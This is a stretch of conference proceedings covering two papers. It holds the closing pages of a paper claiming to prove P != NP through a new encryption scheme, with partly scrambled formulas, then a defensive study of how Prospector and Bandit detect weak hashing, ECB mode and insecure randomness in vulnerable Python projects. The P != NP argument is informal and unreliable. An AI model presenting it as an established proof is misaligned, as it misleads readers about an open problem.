[Encryption Algorithm Q] For 2L − 1 bit key K = (w0 , w1 ), for two blocks of plaintext M = (M1 , M2 ), the encryption process is as follows: p L-bit random numbers completely independently, denoted as X = [Q1] Generate X1 , X2 , . . . , Xp , where p > 1. [Q2] Select three functions f1 : x− > y, f2 : x− > y, f3 : x− > y, where x is a set composed of pL-bit binary data, and y1 , y2 , y3 are composed of L-bit binary data. Calculate Y1 = f (X ), Y2 = f2 (X ), Y3 = f3 (X ). Note that the selection of f1 , f2 , f3 here are polynomial-time complexity. [Q3] Random numbers S0 and M3 are selected completely independently, and the following algorithm is executed: ξY2 ,Y3 : (S0 , M1 ) ⇒ (S1 , C1 ) ξY2 ,Y3 : (S1 ⊕ Y1 , M2 ) ⇒ (S2 , C2 ) ξY2 ,Y3 : (S2 , M3 ) ⇒ (S3 , C3 ) Output (C1 , C2 , C3 , S3 ) as the first part of the ciphertext. [Q4] Use the algorithm introduced in Chapter 3 to Eagle encryption to obtain the second part of the ciphertext , X , . . . , X encrypt X = X 1 2 p
C1 , C2 , . . . , Cp , Cp+1 , Sp+1 . Obviously, the algorithm according to the ciphertext Q is correct, because (C1 , C2 , C3 , S3 ) and C1 , C2 , . . . , Cp , Cp+1 , Sp+1 , the plaintext (M1 , M2 ) can be completely decrypted. Eagle encryption algorithm introduced in Chapter 3 to decrypt First use the C1 , C2 , . . . , Cp , Cp+1 , Sp+1 to get X = X1 , X2 , . . . , Xp , execute Y1 = f1 (X ), Y2 = f2 (X ), Y3 = f3 (X ), and then execute the following algorithm: ξY2 ,Y3 : (S2 , C3 ) ⇒ (S2 , M3 ) ξY2 ,Y3 : (S2 ⊕ Y1 , C2 ) ⇒ S1∗ , M2 ξY2 ,Y3 : S1∗ ⊕ Y1 , C1 ⇒ (S0 , M1 )
Output the complete plaintext (M1 , M2 ). The question we are going to ask is that in algorithm Q, if we know the plaintext (M1 , M2 ), what is the benefit for us to “guess” the key K = (w0 , w1 ). We divide the Q algorithm into two parts, [Q1]-[Q2] are the parameter preparation stages, [Q3] is the first part of the algorithm, and [Q4] is the second part of the algorithm. Obviously these two parts are completely independent. The only connection is Y1 = f1 (X ), Y2 = f2 (X ), Y3 = f3 (X ). Since f1 , f2 , f3 can be regarded as compression functions, Unique Y1 , Y2 , Y3 can be obtained for any X ; for Y1 , Y2 , Y3 , there are 2(p−3)L−1 satisfying Y1 = f1 (X ), Y2 = f2 (X ), Y3 = f3 (X ).
A Proof of P ! = NP: New Symmetric Encryption Algorithm
599
From the decryption process, we can see that for the specified key K = (w0 , w1 ), a unique X can be obtained, so that Y1 , Y2 , Y3 are uniquely determined. But without knowing the key K = (w0 , w1 ), the verification of Y1 has also become a very “complex” problem. This is because for the plaintext-ciphertext pair in the first part, for any Y1 , there are at least 2L−1 possible Y2 , Y3 that are “right”. For the ciphertext of the second stage, only Y1 is known, even though Y2 , Y3 are known, there are at least 2(p−3)L−1 possible X that is “right”. So the problem of verifying Y1 becomes an exponentially-time problem. Therefore, it can be directly proved that the problem of “guessing” the key satisfies the property of a one-way function. See the following theorem and proof for details. [Theorem 6]. For a 2L − 1 bits key K = (w0 , w1 ), for two blocks of plaintext M = (M1 , M2 ), theciphertext obtained after using the encryption algorithm Q are (C1 , C2 , C3 , S3 ) and C1 , C2 , . . . , Cp , Cp+1 , Sp+1 , then under the condition that the plaintext M = (M1 , M2 ) is known, the problem of verifying Y1 generated in [Q2] has no polynomial-time algorithms. Proof: Observe the encryption algorithm Q, there are five independent variables K, X , Y 1 , Y2 , Y3 , [Q2] and [Q3] can be expressed as F1 (X , Y1 , Y2 , Y3 ) = 0, [Q4] expressed as F2 (K, X ) = 0. Without knowing K and X , the problem of verifying Y1 = y1 is equivalent to the problem of finding X that satisfy F1 (X , Y1 , Y2 , Y3 ) = 0 and F2 (K, X ) = 0. For the part [Q3], given M = (M1 , M2 ) and (C1 , C2 , C3 , S3 ), by the following calculation process: ξY2 ,Y3 : (S0 , M1 ) ⇒ (S1 , C1 ) ξY2 ,Y3 : (S1 ⊕ Y1 , M2 ) ⇒ (S2 , C2 ) With C1 , C2 , M2 fixed, for any combination of (Y2 , Y3 , Y1 ), a unique (S0 , M1 , S2 ) can be derived. According to the simple combinatorics principle, it is not difficult to conclude that for any y1 ∈ Y1 , there are at least 2L−1 possible y2 , y3 ∈ Y2 , Y3 that satisfy the condition. Therefore, by any algorithm, to verify y1 ∈ Y1 , it is necessary to verify each of the possible 2(p−2)l−1 X . For the part [Q4], under the condition that C1 , C2 , . . . , Cp , Cp+1 , Sp+1 is known, since K is unknown, there are 22L−1 possible X . Since the process [Q4] is independent from [Q2][Q3], by theorem 5, the problem of finding X have work with exponent-complexity. [Theorem 7]. For a 2L − 1-bits key K = (w0 , w1 ), for two blocks of plaintext M = (M1 , M2 ), theciphertext obtained after using the encryption algorithm Q are , C , C , S , C , . . . , C , C , S and C (C1 2 3 3 ) p+1 p+1 , then under the condition that the p 1 2 plaintext M = (M1 , M2 ) is known, The process of finding the key K = (w0 , w1 ) satisfies the properties of the one-way function.
600
G. Ming
Proof: First, for any key K = (w0 , w1 ), to determine whether it is correct, you only need to use K to decrypt the ciphertext, and then determine whether the obtained plaintext is M . Obviously, the computational complexity is O(L), which satisfies 7.1.1. Next, we need to prove condition 7.1.2, that is, there is no polynomial-time algorithm for the problem of “guessing” the key. Here we adopt the method of proof by contradiction. Assuming that there is a polynomial-time algorithm for the problem of “guessing the algorithm is executed, the ciphertext (C1 , C2 , C3 , S3 ) and the key”, after C1 , C2 , . . . , Cp , Cp+1 , Sp+1 are decrypted to obtain X . The decryption only requires a complexity of O(L). According to the assumption of [Q2], the calculation of Y1 = f1 (X ) is also polynomial-time complexity. And this series of calculations are all polynomial-time complexity, which contradicts the conclusion of Theorem 6. Therefore, the problem of “guessing” the key satisfies the properties of one-way functions. According to Theorem 7, we find a problem that satisfies the properties of one-way functions, which proves the existence of one-way functions. According to Theorem 4, we also directly proved P ! = NP. Finally, will briefly introduce the selection of function fi (i = 1, 2, 3) in [Q2]. In the process of proving that fi needs to satisfy the condition that for any Yi , there are at least exponential possible X satisfying Yi = fi (X ). This is actually very easy to do. For example, if we choose p = L, take the i-th bit of each number of X1 , X2 , . . . XL to satisfy the condition.
7 Conclusion This paper originally constructed a block encryption algorithm, for any known plaintextciphertext pair, any key in the key space satisfies the condition, that is, for any plaintext, encrypting with the same key can obtain any specified ciphertext. By using the characteristics of the above encryption algorithm, this paper constructed another encryption algorithm Q. By the Q algorithm, when the key is known, the decryption process can be completed in polynomial time with L. In the case of known arbitrary plaintext-ciphertext, the problem of “guessing the key” is equivalent to the problem of “verifying some unknown intermediate parameter”, which is in turn equivalent to “find the common element in two independently selected sets of at least 2^L elements each”, which is obviously exponential time complexity with L, which proves that the problem of “guessing the key” satisfies the property of one-way function. According to “the existence of a one-way function means P ! = NP”, which proves that P ! = NP.
References 1. Shannon, C.E.: Communication theory of secrecy systems. Bell Syst. Techn. J. 28(4), 656–715 (1945) 2. Matsui, M.: Linear cryptanalysis method for DES cipher. In: Advances in cryptology: EUROCRYPT’ 93, LNCS, vol. 765, pp. 386–397. Springer (1993). https://doi.org/10.1007/3-54048285-7_33
A Proof of P ! = NP: New Symmetric Encryption Algorithm
601
3. Kaliski, B.S., Robshaw, M.J.B.: Linear Cryptanalysis Using Multiple Approximations[C] Annual International Cryptology Conference. Springer, Berlin, Heidelberg (1994) 4. Biryukov, A., De Cannière, C., Quisquater, M.: On Multiple Linear Approximations. In: Franklin, M. (ed.) CRYPTO 2004. LNCS, vol. 3152, pp. 1–22. Springer, Heidelberg (2004). https://doi.org/10.1007/978-3-540-28628-8_1 5. Cho, J.Y., Hermelin, M., Nyberg, K.: A New Technique for Multidimensional Linear Cryptanalysis with Applications on Reduced Round Serpent. In: Lee, P.J., Cheon, J.H. (eds.) ICISC 2008. LNCS, vol. 5461, pp. 383–398. Springer, Heidelberg (2009). https://doi.org/10.1007/ 978-3-642-00730-9_24 6. Eli Biham, Adi Shamir. Differential Cryptanalysis of the Data Encryption Standard[M]. Springer-Verlag, 1993 7. Biham, E., Biryukov, A., Shamir, A.: Cryptanalysis of Skipjack Reduced to 31 Rounds Using Impossible Differentials. In: Stern, J. (ed.) EUROCRYPT 1999. LNCS, vol. 1592, pp. 12–23. Springer, Heidelberg (1999). https://doi.org/10.1007/3-540-48910-X_2 8. Tsunoo, Y., Tsujihara, E., Shigeri, M., et al.: Cryptanalysis of CLEFIA using multiple impossible differentials. In: 2008 International Symposium on Information Theory and Its Applications—ISITA 2008. IEEE, pp. 1–6 (2008) 9. Arora, S., Barak, B.: Computational Complexity: A Modern Approach (2009)
Python Cryptographic Secure Scripting Concerns: A Study of Three Vulnerabilities Grace LaMalva1 , Suzanna Schmeelk1(B) , and Dristi Dinesh2 1 St. John’s University, Queens, NY 11439, USA
[email protected], [email protected] 2 University of Southern California, Los Angeles, CA 90089, USA [email protected]
Abstract. The maintenance and protection of data has never been more important than in our modern technological landscape. Cryptography remains a key method for lowering risks against the confidentiality and integrity of data. This paper will examine secure scripting topics within cryptography such as insecure hashing methods, insecure block cipher implementation, and pseudo random generation of numbers, through the scope of open-source Python scripts. Our research examines the analysis results of the open-source projects from two popular static analysis tool reports, namely Prospector and Bandit, to identify vulnerable scripting usages and patterns. Our analysis includes a comparison of the tool findings with data collected upon manual review. Our findings show that despite the many capabilities and features of common Python static analysis tools, seldom detection for insecure use of cryptography exists. Prospector was able to detect 0% of the cryptographic three identified vulnerability cases compared to 66% detection in Bandit. In addition, manual review of code remains necessary for security related issues that cannot be detected by static analysis tools as revealed by the presence of false negatives from this study. Keywords: Python software development · Static analysis · Cybersecurity · Secure scripting · Cryptography
1 Introduction Static analysis is a method of analyzing code without program execution [1]. Techniques can be employed on any software (e.g. source, byte, machine) at any point in the software lifecycle (e.g. during development time weakness identification, reverse engineering deployed software for malware fingerprints) [2]. Static analysis can also be paired with dynamic analysis. Analysis can identify true or false positives for coding paradigms under review [3]. Mitigating true positive coding issues such as errors, security vulnerabilities, and performance issues can improve scripts and software. Ideal static analysis tools can address aspects of software including configuration; security weaknesses; space, time, battery concerns; extensibility; and other deterministic heuristics [4]. Identifying programming errors and underlying security issues (e.g., cryptography usages) early in development can optimize efficiency, accuracy, and consumer data security. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 602–613, 2023. https://doi.org/10.1007/978-3-031-28073-3_42
Python Cryptographic Secure Scripting Concerns
603
Python is a high-level programming language that has seldom benefited from static analysis. While we have considerable experience for programming languages with static type systems, especially for C, C++, and Java, languages with dynamic behavior such as Python require different approaches [5]. However, such dynamic behavior might be an obstacle when we try to validate the software systems written in Python [6]. This could be further reason being there is not much research in the field prior. Python is accessible for scripting, application development, among other use cases [7]. Python offers extensive supporting libraries, integration, and productivity adoptions. The fact that the complexity of industrial software generally grows faster than its authors’ ability to manage that complexity is one of the central challenges facing software engineering and computer science as discipline [8]. The research contribution of this paper fills a literature gap of detecting cryptographic concerns with Python static analysis. This paper is a case study of three types of cryptographic vulnerabilities, although the static analysis tools identified security vulnerabilities irrelevant (i.e., non-cryptographic) to this research. This paper firstly introduces the importance of static analysis, while describing its significance under the scope of Python. It then describes the unique problem and amount of significance it carries within security. Next, it explores a high-level overview of the two analysis tools in question. We then describe our methodologies for collecting data and describe our findings at large. Finally, we discuss possible future work, and conclude with our results.
2 Problem and Significance Secure Scripting Concerns Specific to Python In the development of a program in Python, implementing secure scripting techniques is crucial for mitigating vulnerabilities and risks within the code to ensure the utmost security [9]. Despite Python’s aforementioned versatility, there are some issues of concern relative to secure scripting which can affect program quality and security. Python users often hold the belief that the code to be executed is not malicious. However, current versions of Python lack implementation mechanisms to enforce a security policy to prevent code from accessing resources, such as files or sockets [4]. Although Python additionally does not include built-in support for input validation, there are efforts to implement a taint mode in Python, of which can detect injection vulnerability patterns [4]. Injection vulnerabilities allow for weakness within a program for malicious code due to system commands, or “improper sanitization” of inputs, which can additionally affect file accessibility through invalid file paths (directory traversal). Outdated dependencies pose a security concern, whereas this weakness can make the code more susceptible to malware. Static analysis offers tools which provide a practical approach for support during program development. Necessity for Maintaining Confidentiality and Integrity via Cryptography Cryptography is the primary tool for protecting information [10]. Cryptography can be defined as techniques that cipher data, depending on specific algorithms that make the data unreadable to the human eye unless decrypted by algorithms that are predefined by
604
G. LaMalva et al.
the sender [11]. Cryptography, not only protects data from theft or alteration, but can also be used for user authentication [12]. Cryptography preserves the confidentiality, integrity, and availability of data making it a necessary front in any cybersecurity infrastructure. Ordinary developers usually lack knowledge in practical cryptography, and support from specialists is rare. Frequently, these difficulties are addressed by running static analysis tools to automatically detect cryptography misuse during coding and reviews. However, the effectiveness of such tools is not yet well understood [3]. Continuous testing and analysis for security threats related to cryptography throughout the development lifecycle can positively impact the results of a project. Prior research shows that the coverage of public-key cryptography by static code analysis tools is full of blind spots, because tools prioritize only those misuses related to the most frequent coding tasks and use cases, while neglecting infrequent use cases [13]. Cryptography must be acknowledged as a secure scripting concern in order to provide a comprehensive overview on application security. The issues outlined in this research include insecure hashing, insecure block cipher modes, and pseudorandomness. Cryptographic hashing algorithms are one-way functions; under no circumstance, should there be an inverse function. With an ideal cryptographic hashing function, reversing the digest back to the message should be infeasible and extremely difficult [14]. However, certain cryptographic hash functions such as Message Digest 5 (MD5), and Secure Hash Algorithm 1 (SHA-1) were published almost over two decades ago to secure passwords in the environment they were implemented in. Since the publication of these mentioned algorithms, associated weaknesses and vulnerabilities have been identified. The evolution of cryptography has rendered some previously secure methods of encryption insecure. For example, in AES encryption, a block mode is used to combine several blocks for encryption and decryption [15]. However, some block modes are considered insecure by experts [16]. The Electronic Code Book (ECB) mode uses simple substitution, making it one of the easiest and fastest algorithms to implement. The input plaintext is divided into a smaller number of blocks and encrypted individually using the key. This allows each encrypted block to be decrypted individually. Encrypting the same block twice will result in the same ciphertext being returned twice. The use of the random package is problematic in Python scripting when performing cryptographic functions. Random was built using the Mersenne Twister, and it is one of the most extensively tested random number generators in existence. However, being completely deterministic, it is not suitable for all purposes, and is completely unsuitable for cryptographic purposes [20]. Instead, the secrets module is recommended for the generation of secure random numbers for maintaining secrets [21].
3 Review of Literature While there is extensive research on the theory of cryptography, there is a need for additional research in its usage in enterprise scripting and applications. The incorrect use of cryptography is a common source of critical software vulnerabilities [22]. Previous literature [23] using open source independently developed static analysis tools reveals that 52.26% of the Python projects have at least one misuse in reference to the crypto libraries, examples shown in Fig. 1. Schmeelk and Tao [24] analyzed the misuse of
Python Cryptographic Secure Scripting Concerns
605
cryptography within Android, however, an empirical study examining cryptography usage among all Python, Java, or C [25]. Cryptographic API misuse is responsible for a large number of software vulnerabilities. In many cases developers are overburdened by the complex set of programming choices and their security implications [26].
Fig. 1. Crypto misuses in Java and C with an example of a violation in python [23].
A common complaint of analysis tools in general is the false positives garnered and the time filtering through which errors are relevant or interesting to developer coding style. This has inspired auto-detection and remediation tools to be developed to streamline the false-positive filtering process [27]. However, another perspective essential for consideration are false negatives describing issues that exist but are not detected. False negatives reveal vulnerabilities present that are intended to be revealed by testing, but are mistakenly reported as false or nonexistent. Prior studies carried out by Thung et al. describe many field defects detected by static bug finding tools, however there existed a substantial proportion of defects which could not be flagged [28]. This can be more detrimental than a false positive which describes a problem that does not exist, where a false negative comments on an issue that does exist but is not detected. False negatives are much more dangerous because they lead to a false sense of security [29]. The objective of Prospector is to be utilized as a static analysis tool to its maximum capabilities upon initial installation. Prospector provides default profiles, which provide a base benchmark. Furthermore, the tool is reported to adapt to libraries the analyzed codebase uses [30]. While some python static analysis tools focus on one type of problem, some focus on a wide variety of subjects. Static analysis can reveal errors, warnings, code smells and style problems; however, no singular issue can be found by all tools described above. Prospector aims at compiling multiple python tools into one and ultimately serves as a wrapper for other smaller functioning static analysis tools. With this idea of Prospector being a sort of dynamic, all-in-one type of static analysis tool, it serves as a valid baseline for further comparison to similar tools. The primary aim of Bandit is to analyze and identify security issues in Python code. This serves as a specialized type of static analysis tool in this research expected to yield a more specific type of output related to security [30]. Bandit processes each file, builds an Abstract Syntax Tree (AST), and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning the input files, it generates a report. Bandit was originally developed within the OpenStack Security Project and later moved to PyCQA (Python Code Quality Authority [31]. The generated report provides the findings from the scanned files in accordance with priority, which can determine the quality of security performance of the code.
606
G. LaMalva et al.
The utilization of Bandit for static analysis can identify security defects in Python code early in the development process, before production. Errors can be detected and resolved in existing projects [1]. Issues relevant to the study on cryptography issues within these scripts included weak hashing algorithms, insecure block cipher modes, and pseudo random number generation, while other unrelated security issues included invalid pickle serialization and deserialization, shell injections, and SQL injections [32]. The issue detection report output by Bandit upon initial analysis is categorized by identification codes for detectors, mnemonic names, brief descriptions, severity (S) metrics, confidence (C) of detection for an issue, and references for further information - following Bandit’s source code. Issues detected can be further classified into one of seven specific detected concerns: generic issues, single detector for running a particular web application in debug mode, function calls, import statements, insecure network protocols, code injections, and cross-site scripting [33].
4 Methodology The five sources were examined initially through the method of manual review by the authors to identify prospective issues related to cryptography. Once identified and enumerated, these issues were verified by the findings or lack thereof in the Prospector and Bandit output. Each of the repositories were scanned by each of the two static analysis tools, Prospector and Bandit, for secure scripting vulnerabilities including but not limited to insecure hashing algorithms, insecure block ciphers, hardcoded passwords. These sources include preconstructed custom scripts with manual implementations of AES128 ECB, and other open-source scripts available on GitHub [34]. The open-source portion of the dataset includes Contrast-Security-OSS/vulnpy [16], fportantier/vulpy [17], jorritfolmer/vulnerable-api [18], and sgabe/DSVPWA [19]. Running both a single file script, and larger projects of various sizes validates that scalability is not an issue regarding the detection of issues within code. 4.1 ECB Mode Benchmark We demonstrated a base case for an AES-128 implementation with ECB mode in order to illustrate tool findings from a low-level scale project. As mentioned in prior sections, ECB was developed for non-secure reasons and remains the weakest mode of operation. Pyryptodome, for example, is a package available to use built-in Python mechanisms in order to create an ECB Mode [35]. The code analyzed defines a block size of 16 bytes and includes padding and unpadding variables to account for the different size bytes [36]. The code under investigation, implemented an encrypt method with crypto keys and encoding. 4.2 Open-Source Repository Information for Four Projects Static analysis review of cryptography in the scope of open-source development is essential. Projects such as Android and the Linux Kernel are used by millions of users on a daily basis and are open-source [37]. This gives importance to reviewing certain types
Python Cryptographic Secure Scripting Concerns
607
of projects whether they are open-source or not [38]. Testing smaller sets of vulnerable open-source code can serve as a benchmark when testing sets of projects with a larger scale. The first open-source repository under examination includes vulpy, an open-source repository with known vulnerabilities such as Cross Site Scripting (XSS), Insecure Deserialization, SQL Injection (SQLi), Authentication Bruteforce, Authentication Bypass, Cross Site Request Forgery (CSRF). Upon initial inspection of the source code, issues regarding hardcoded passwords in file db.py. This ideally should be detected by Bandit as an issue for remediation. Vulnpy is the second open-source script inspected and is a reported insecure repository containing several web application vulnerabilities from its Flask, Django, Pyramid, Falcon, Bottle, FastAPI, amongst other APIs contained within it. Prior installation of its dependencies through pip or the use of a virtual environment is recommended. Manual inspection of the code reveals insecure MD5 hashing, and a Pseudo Random Number Generator implementation. The third repository Damn Simple Vulnerable Python Web Application (DSVPWA) features a series of vulnerabilities including very basic session management and HTML (HyperText Markup Language) templating. It has capabilities to demonstrate the following attacks including Cross site Request Forgery, Command Injection, Deserialization of untrusted Data amongst other capabilities. Prior to analysis, the investigation anticipated the presence of one hardcoded password. The fourth repository under examination is vulnerable-api which includes key vulnerabilities such as insecure transport, user enumeration, information disclosure, authentication bypass, no input validation, SQL injection, weak session token cryptography, poor session validation, plaintext storage of secrets, command injection, regex denial of service, cross site scripting, and missing security headers. The presence of insecure hashing algorithms was predicted to be identified by static analysis. 4.3 Analysis of Open-Source Repositories with Static Analysis Tools The static analysis process was designed to be tested using two tools – Prospector and Bandit. Prospector served as a baseline detection for what the average static analysis tool is able to identify. Bandit was a security-specific static analysis tool equipped with more resources to identify possible cryptographic issues in the different code samples [33]. It is expected upon initial manual inspection of the different code bases that Bandit is supposed to output B303 MD5 which describes the use of MD2, MD4, MD5, or SHA1 hash functions [33], B305 Cipher modes describing the user of insecure cipher modes [33], and finally B311 Random describing the use of Pseudo-random generators for cryptography/security tasks [33]. Figure 2, from Ruohonen et al. [33] show examples of issues detected with Bandit with plugins enabling more custom detections.
608
G. LaMalva et al.
Fig. 2. Issue types detected by Bandit [33]
5 Findings The findings with Prospector were not specific to cryptographic vulnerabilities or weaknesses, but rather recommendations to optimize code stylistically, and remove unnecessary, unused, or redundant portions in the code. Security related findings pertained to outdated packages, and missing imports. Out of the five analyzed test cases (n = 4 open-source projects and n = 1 benchmarks), Prospector produced 327 total messages of varying severity under the default strictness and profile, with none of the messages bringing attention to present cryptographic issues. Prospector was able to detect a total of 71 issues in DSVPWA with the default profile but none in reference to the misuse of cryptography. All detection referred more to specific web application-based vulnerabilities. Prospector was able to detect 66 concerns for vulnerable-api with the default profile which mostly referred to only misplaced or unused imports and not necessarily cryptography misuse even though it is known to contain weak session token cryptography. Vulpy contains 69 messages with the default profile and levels of strictness with none pertaining to cryptography. Concerns included unnecessary “else” after “return”, unused imports, trailing newlines, and if statements that can be replaced with return statements. Possible remediations developers can take are removing unused dependencies and imports as these can be additional vectors for attack. This will serve as an additional layer of application security. Vulnpy, the 3rd of 4 open-source projects, had reports of 121 total concerns, none pertaining to cryptographic issues despite the presence of insecure hashing and pseudorandomness within the code. The fifth and final test case we ran through Prospector was the AES-128 ECB script that is known to be inherently insecure in terms of its use of an insecure block method. Prospector returned no output concerns in reference to the use of AES or primitive methods within the Crypto Cipher packages and returned a total of 0 messages pertaining to warnings in the code. This demands special attention because developers employing
Python Cryptographic Secure Scripting Concerns
609
insecure methods of encryption similar to ECB could run their scripts though these tools and have no warnings returned to them, namely a false negative. Table 1. Issues detected in each Cryptography related issue
Prospector
Bandit
Weak Hashing Algorithms
X
✓
Psuedo Random Number Generator
X
✓
Insecure Block Ciphers
X
X
Bandit yielded many results regarding security related vulnerabilities, with some pertaining to Cryptography specific concerns, as shown in Table 1 and Fig. 3. The Vulpy code analyzed by Bandit reported 43 total issues with none of them pertaining to the subject matter of this study. B105 with hardcoded passwords was reported, but is outside of the scope of cryptography in this research as it would typically fall into OWASP Insecure Data Storage Category [34]. The second repository we configured Bandit to analyze was Vulnpy reporting a total of 89 issues. In terms of cryptography, the tool reported n = 4 instances of B324 Use of weak MD4, MD5, or SHA1 hash for security and n = 4 instances of B311 pseudo-random number generators (PRNG). The third repository analyzed with Bandit was vulnerable-api reporting 16 total issues with 2 referring to insecure hashing which is relevant to the study as it includes B324 Use of weak MD4, MD5, or SHA1 hash for security. The fourth repository analyzed was DSVPWA reporting no issues in the scope of cryptography. Other than the high severity, the second report was of a hardcoded password, but is outside of the Cryptography scope of this study. The fifth benchmark case, ECB.py, returned n = 2 messages with only n = 1 pertaining to insecure hashing, and another message outside of the scope of this research related to a deprecated package. It was expected to return a message B305 describing an insecure block mode, however this was not the case. While the creation of Python specific security static analysis tools has given developers the ability to identify security specific concerns throughout the secure software development lifecycle, manual review and testing is still necessary to indicate differences between true-positives, false-positives, true-negatives, and false-negatives. In addition, security specific static analysis tools have limited capability to perform effective cryptography analysis. Most output from the Prospector tool refers to stylistic or code efficiency output rather than vulnerabilities. From Bandit, there was considerable output in terms of vulnerability, but limited output in terms of cryptography specific concerns. The total number of detections for each issue can be seen in Table 2. Considering the severity of exposure when using ECB mode and other primitive block cipher modes, static analysis tools need to adopt detection of these vulnerabilities in order to provide a more cohesive overview of application security. While it is outside the scope of misuse of cryptography, there were instances detected of insecure data storage [38] through the forms of hardcoded passwords and storing data
610
G. LaMalva et al.
Fig. 3. Bandit findings
Table 2. Number of Each Issue Type Found in Bandit Issues
Vulpy
Vulnpy
Vulnerable-api
DSVPWA
ECB.py
Weak Hashing algorithms
0
4
2
0
1
PRNG
0
4
0
0
0
Insecure Block Ciphers
0
0
0
0
0
on the /tmp directory. The Bandit analysis tool detected n = 1 instance in DSVPWA and n = 5 instances in vulpy of hardcoded passwords and was denoted by Bandit documentation finding label B105. The tools only identified the vulpy repository as containing storage on the /tmp directory which is typically world-read/writable (if they were not, most applications would not be able to create/read the temporary files there). That read/writeability makes the location even more accessible to any attacker or prowler who gains access [39].
6 Discussions This research reports on case studies of open-source Python scripts through two popular Python static analysis tools, Prospector and Bandit. Static tools can be employed as a first line of defense to aid developers to build software with accurate utilization of the functions, usage, and capabilities, lowering the risk of known concerns, especially if the false positives remain low in count [41]. The intended identification of specific vulnerabilities within the analyzed code can mitigate further risks early in the development
Python Cryptographic Secure Scripting Concerns
611
process in order to achieve initiated solutions for the coding errors. It is important to detect security concerns where non-secure operations, such as ECB mode algorithms, are known to be more susceptible to cyber-attacks in comparison to advanced approaches. The methodology and findings of this research show that some cryptographic concerns remain undetected under these Python static analysis tools.
7 Conclusions and Future Work The rate of the world’s technological advancement does not cease to evolve. It is therefore essential that the methods of secure scripting and cryptography are maintained and continually reviewed. The future of cryptography can introduce emerging secure possibilities for data privacy and encryption, such as those in the field of cloud computing, cryptography associated with quantum computing, and fully homomorphic encryption. Although these advancements show promise for the possibilities of cryptography and secure scripting in the future, it is important to recognize the implications and challenges that can further develop as a result of neglected vulnerabilities and constructions, such as that of these research conclusions. As seen through the literature review, there are numerous Python tools available for stylistic improvements, and time and space optimization for performance enhancements, but these tools seldom exist under the umbrella of security that are available for cryptography. This paper examines cryptography through the static analysis tools described in order to address the lack of research in this field. This research communicates the need for special static analysis tools to detect insecure use of cryptography while giving special attention to issues intended to be detected in contrast to what is officially picked up. Cryptography should be regarded in the creation of static analysis tools in order to create a cohesive overview of security issues present. Considering the different key generation methods, block modes, encryption schemes, and ciphers available, it would benefit the application security community to have a comprehensive tool that detects unique Python issues for cryptography.
References 1. Gulabovska, H., Porkolab, Z.: Survey on static analysis tools of python programs. http://ceurws.org/Vol-2508/paper-gul.pdf. Accessed 29 May 2022 2. McGraw, G., et al.: Static analysis for security. Institute of Electrical and Electronics Engineer (2004), vol. 2:6, pp. 76–79. https://ieeexplore.ieee.org/abstract/document/1366126 3. Braga, A., Dahab, R., Antunes, N., Laranjeiro, N., Vieira, M.: Understanding how to use static analysis tools for detecting cryptography misuse in software. IEEE Trans. Reliab. 68(4), 1384–1403 (2019). https://doi.org/10.1109/TR.2019.2937214 4. Chess, B., West, J.: Secure Programming with Static Analysis. United States: Pearson Education (2007) 5. Gulabovska, H., Porkoláb, Z.: Evaluation of Static Analysis Methods of Python Programs. ipsitransactions, July 2020 6. Dong, T., Chen, L., Xu, Z., Yu, B.: Static type analysis for python. In: 2014 11th Web Information System and Application Conference, pp. 65–68 (2014). https://doi.org/10.1109/ WISA.2014.20
612
G. LaMalva et al.
7. Lindstrom, G.: Programming with python. IT Professional 7(05), 10–16 (2005) 8. P.T.G.H. Inc., P. Thomson, G. H. Inc., G. H. I. V. Profile, and O. M. V. A. Metrics: Static Analysis: An introduction: The fundamental challenge of software engineering is one of Complexity. Queue, vol. 19, no 4, Queue. https://dl.acm.org/doi/10.1145/3487019.3487021. Accessed 28 May 2022 9. Ferrer, F., More, A.: Towards secure scripting development. Argentina Software Development Center, vol. 1, pp. 42–53 (2011). https://40jaiio.sadio.org.ar/sites/default/files/T2011/WSegI/ 972.pdf 10. Nielson, J., Monson, C.: Practical Cryptography in Python: Learning Correct Cryptography by Example, 1st edn. Apress (2019) 11. Qadir, A.M., Varol, N.: A review paper on cryptography. In: 2019 7th International Symposium on Digital Forensics and Security (ISDFS), pp. 1–6 (2019). https://doi.org/10.1109/ISDFS. 2019.8757514.URL: https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=8757514& isnumber=8757466 12. Kessler, G.C.: An overview of cryptography - princeton university. https://www.cs.princeton. edu/~chazelle/courses/BIB/overview-crypto.pdf. Accessed 29 May 2022 13. Mundt, M., Baier, H.: Towards mitigation of data exfiltration techniques using the MITRE ATT&CK framework. Research Institute CODE, Universität der Bundeswehr München, Germany, vol. 1 pp. 1–22 (2021). https://www.unibw.de/digfor/publikationen/pdf/2021-12-icd f2c-mundt-baier.pdf 14. Algoma. https://archives.algomau.ca/main/sites/default/files/2012-25_001_011.pdf. Accessed 28 May 2022 15. Devi, S.V., Kotha, H.D.: Journal of Physics: Conference Series; Bristol, vol. 1228, Iss. 1, May 2019 16. Contrast-security-OSS/VULNPY: Purposely-vulnerable python functions. GitHub. https://git hub.com/Contrast-Security-OSS/vulnpy. Accessed 28 May 2022 17. Fportantier, Fportantier/vulpy: Vulnerable python application to learn secure development. GitHub, 14 Sep 2020. https://github.com/fportantier/vulpy. Accessed 28 May 2022 18. Jorritfolmer/vulnerable-API: Enhanced Fork with logging, openapi 3.0 and Python 3 for Security Monitoring Workshops. GitHub. https://github.com/jorritfolmer/vulnerable-api. Accessed 28 May 2022 19. sgabe/DSVPWA: Damn simple vulnerable python web application. GitHub. https://github. com/sgabe/DSVPWA. Accessed 28 May 2022 20. Random - generate pseudo-random numbers. random - Generate pseudo-random numbers - Python 3.10.5 documentation. https://docs.python.org/3/library/random.html. Accessed 27 May 2022 21. Secrets - generate secure random numbers for managing secrets. secrets - Generate secure random numbers for managing secrets - Python 3.10.5 documentation. https://docs.python. org/3/library/secrets.html#module-secrets. Accessed 27 May 2022 22. Braga, A., Dahab, R., Antunes, N., Laranjeiro, N., Vieira, M.: Practical evaluation of static analysis tools for cryptography: benchmarking method and case study. In: 2017 IEEE 28th International Symposium on Software Reliability Engineering (ISSRE), pp. 170–181 (2017). https://doi.org/10.1109/ISSRE.2017.27 23. Wickert, A.-K., et al.: Python crypto misuses in the wild. In: ESEM Conference Bari, Italy (2021), vol. 1, pp. 1–6. https://dl.acm.org/doi/pdf/10.1145/3475716.3484195 24. Schmeelk, S., Tao, L.: A case study of mobile health applications: the OWASP risk of insufficient cryptography. J. 